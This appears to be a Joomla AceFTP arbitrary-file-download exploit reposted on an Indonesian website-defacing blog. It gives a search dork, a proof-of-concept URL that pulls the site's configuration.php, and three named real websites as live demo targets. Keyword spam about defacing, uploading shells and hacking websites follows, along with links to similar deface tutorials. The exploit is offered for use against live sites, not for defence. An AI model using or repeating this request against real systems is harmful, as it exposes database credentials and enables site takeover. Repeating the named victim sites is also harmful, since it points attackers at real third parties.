Joomla AceFTP Arbitrary File Download

Joomla AceFTP Arbitrary File Download

##############################################################
# Exploit Title: Joomla com aceftp Arbitrary File Download Vulnerability
# Exploit Author: howucan
# Website : http://howucan.gr
# Dork : inurl:/administrator/components/com_aceftp/
# Software Website : http://www.joomace.net/downloads/aceftp
# Version : ALL
# Date : 2016/08/15
# Tested on : Parrot Os 3.1
# Category: webapps
# Video : https://www.youtube.com/watch?v=aMy0oDdg7Ug
#
########################
# Description :
#
# AceFTP is a smart, fast and lightweight file manager component. It
# operates from Joomla back-end so you don't have to use any FTP program
anymore.
########################
# POC :
#
#
http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
##############
# Demo1 :
www.iraqcoc.ir/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
# Demo2 :
www.diethneis-sxeseis.gr/site/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
# Demo3 :
www.rederural.pt/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
#
################################
#
# PAOK G4 Salonika Punk Rock City
################################


cara deface pemula,
cara deface dengan mudah,
cara hack website,
cara upload shell,
cara deface dengan bypass admin,
cara deface dengan jumping,
cara upload shell ke magento,
cara deface dengan magento,
cara deface dengan wordpress,
cara upload shell di wordpress,
trik deface dengan mudah,
cara menjadi hacker,
hacker paling berbahaya
Cara deface dengan SQL.
berita teknologi|hacked by | di hack oleh|anonymous|peretas|info teknologi|web kab|di retas|hacker|di deface|defacer|zone-h|motif

★★★★

  • Mencari Bug Celah Website Dengan Termux
    Mencari Bug Celah Website Dengan Termux Apa Itu Bug Website? Bug Website adalah suatu kerentanan di dunia komputer adalah kelemahan dari program / infrastruktur yang memungkinkan bisa dieksp ...
  • Deface OJS Ajax getInterests Auto Exploit
    Deface OJS Ajax getInterests Auto Exploit Beberapa hari yang lalu jalan2 di grup underground Nemu Exploit ini. Di share sama Team indoXploit.  * Open Journal System Ajax getInterests * Inva ...
  • Bypass Admin WebositeZ [Noredirect]
    Bypass Admin WebositeZ [Noredirect] Oke langsung Ke Tutorial gans... Download dulu addons Noredirect di Mozilla. Pilih salah satu Web Dorknya :  1. "Design By WebositeZ" 2. "Powere ...
  • Cara Menutup Bug Bypass Admin
    Cara Menutup Bug Bypass AdminBypass Admin Login adalah melakukan input dengan memasukkan data dengan karakter dan perintah SQL tertentu dalam nama pengguna dan kata sandi. Kemudian, t ...

Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>